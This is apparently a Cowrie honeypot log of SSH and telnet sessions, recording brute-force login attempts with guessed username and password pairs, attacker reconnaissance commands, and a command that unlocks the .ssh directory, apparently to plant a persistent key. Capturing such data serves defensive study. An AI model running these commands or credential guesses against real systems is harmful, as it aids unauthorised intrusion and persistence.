{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:12:57.065103Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:12:57.333996Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-09-08T20:12:57.334684Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-09-08T20:12:57.335160Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:12:57.426606Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:12:57.655772Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-09-08T20:12:57.656649Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:12:57.747970Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:12:57.945524Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-09-08T20:12:57.946389Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":197,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:12:58.037449Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:12:58.310589Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-09-08T20:12:58.311347Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:12:58.404005Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:12:58.600305Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-08T20:12:58.600999Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:12:58.692425Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:12:58.956091Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-09-08T20:12:58.956784Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:12:59.048187Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:12:59.285019Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-09-08T20:12:59.285857Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:12:59.376843Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:12:59.576971Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-08T20:12:59.577904Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:12:59.669324Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:12:59.944301Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-09-08T20:12:59.944970Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:13:00.035954Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:13:00.237438Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-09-08T20:13:00.238278Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:13:00.329883Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:13:00.606103Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-09-08T20:13:00.606849Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:13:00.698757Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.session.closed","duration":"18.2","message":"Connection lost after 18.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:13:00.700215Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":50942,"dst_ip":"1.2.3.4","dst_port":22,"session":"03603b35dc32","protocol":"ssh","message":"New connection: 103.206.72.2:50942 (1.2.3.4:22) [session: 03603b35dc32]","sensor":"my-vps","timestamp":"2025-09-08T20:13:19.147769Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:13:19.152791Z","src_ip":"103.206.72.2","session":"03603b35dc32"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:13:19.322577Z","src_ip":"103.206.72.2","session":"03603b35dc32"}
{"eventid":"cowrie.login.failed","username":"web","password":"12345","message":"login attempt [web/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T20:13:20.012313Z","src_ip":"103.206.72.2","session":"03603b35dc32"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:13:21.190939Z","src_ip":"103.206.72.2","session":"03603b35dc32"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":50428,"dst_ip":"1.2.3.4","dst_port":22,"session":"306fb9d38575","protocol":"ssh","message":"New connection: 77.75.56.63:50428 (1.2.3.4:22) [session: 306fb9d38575]","sensor":"my-vps","timestamp":"2025-09-08T20:13:54.920137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:13:54.920803Z","src_ip":"77.75.56.63","session":"306fb9d38575"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:13:54.958176Z","src_ip":"77.75.56.63","session":"306fb9d38575"}
{"eventid":"cowrie.login.failed","username":"vagrant","password":"vagrant@2025","message":"login attempt [vagrant/vagrant@2025] failed","sensor":"my-vps","timestamp":"2025-09-08T20:13:55.157132Z","src_ip":"77.75.56.63","session":"306fb9d38575"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:13:56.196623Z","src_ip":"77.75.56.63","session":"306fb9d38575"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.117.69","src_port":60626,"dst_ip":"1.2.3.4","dst_port":22,"session":"363700e7381c","protocol":"ssh","message":"New connection: 14.103.117.69:60626 (1.2.3.4:22) [session: 363700e7381c]","sensor":"my-vps","timestamp":"2025-09-08T20:14:16.251399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:14:16.252316Z","src_ip":"14.103.117.69","session":"363700e7381c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:14:16.452349Z","src_ip":"14.103.117.69","session":"363700e7381c"}
{"eventid":"cowrie.login.success","username":"root","password":"Pp123456","message":"login attempt [root/Pp123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:14:17.881716Z","src_ip":"14.103.117.69","session":"363700e7381c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:14:18.349414Z","src_ip":"14.103.117.69","session":"363700e7381c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:14:18.350266Z","src_ip":"14.103.117.69","session":"363700e7381c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:14:18.351433Z","src_ip":"14.103.117.69","session":"363700e7381c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36202,"dst_ip":"1.2.3.4","dst_port":23,"session":"c3e966ebe236","protocol":"telnet","message":"New connection: 212.227.125.160:36202 (1.2.3.4:23) [session: c3e966ebe236]","sensor":"my-vps","timestamp":"2025-09-08T20:14:26.459757Z"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":55920,"dst_ip":"1.2.3.4","dst_port":22,"session":"45a8e32861b3","protocol":"ssh","message":"New connection: 216.107.136.92:55920 (1.2.3.4:22) [session: 45a8e32861b3]","sensor":"my-vps","timestamp":"2025-09-08T20:14:28.608047Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:14:28.609251Z","src_ip":"216.107.136.92","session":"45a8e32861b3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:14:28.703867Z","src_ip":"216.107.136.92","session":"45a8e32861b3"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"0","message":"login attempt [hadoop/0] failed","sensor":"my-vps","timestamp":"2025-09-08T20:14:29.107114Z","src_ip":"216.107.136.92","session":"45a8e32861b3"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:14:30.200333Z","src_ip":"216.107.136.92","session":"45a8e32861b3"}
{"eventid":"cowrie.session.closed","duration":7.695863962173462,"message":"Connection lost after 7 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:14:34.155550Z","src_ip":"212.227.125.160","session":"c3e966ebe236"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":44308,"dst_ip":"1.2.3.4","dst_port":22,"session":"20b38b4f6eda","protocol":"ssh","message":"New connection: 103.206.72.2:44308 (1.2.3.4:22) [session: 20b38b4f6eda]","sensor":"my-vps","timestamp":"2025-09-08T20:14:35.604294Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:14:35.609245Z","src_ip":"103.206.72.2","session":"20b38b4f6eda"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:14:35.781278Z","src_ip":"103.206.72.2","session":"20b38b4f6eda"}
{"eventid":"cowrie.login.failed","username":"kafka","password":"kafka@2025","message":"login attempt [kafka/kafka@2025] failed","sensor":"my-vps","timestamp":"2025-09-08T20:14:36.477681Z","src_ip":"103.206.72.2","session":"20b38b4f6eda"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:14:37.654957Z","src_ip":"103.206.72.2","session":"20b38b4f6eda"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":46668,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0ba3e2c2d5d","protocol":"ssh","message":"New connection: 77.75.56.63:46668 (1.2.3.4:22) [session: f0ba3e2c2d5d]","sensor":"my-vps","timestamp":"2025-09-08T20:14:58.378012Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:14:58.379058Z","src_ip":"77.75.56.63","session":"f0ba3e2c2d5d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:14:58.415784Z","src_ip":"77.75.56.63","session":"f0ba3e2c2d5d"}
{"eventid":"cowrie.login.success","username":"root","password":"Qaz@123456","message":"login attempt [root/Qaz@123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:14:58.609277Z","src_ip":"77.75.56.63","session":"f0ba3e2c2d5d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:14:58.703372Z","src_ip":"77.75.56.63","session":"f0ba3e2c2d5d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:14:58.704075Z","src_ip":"77.75.56.63","session":"f0ba3e2c2d5d"}
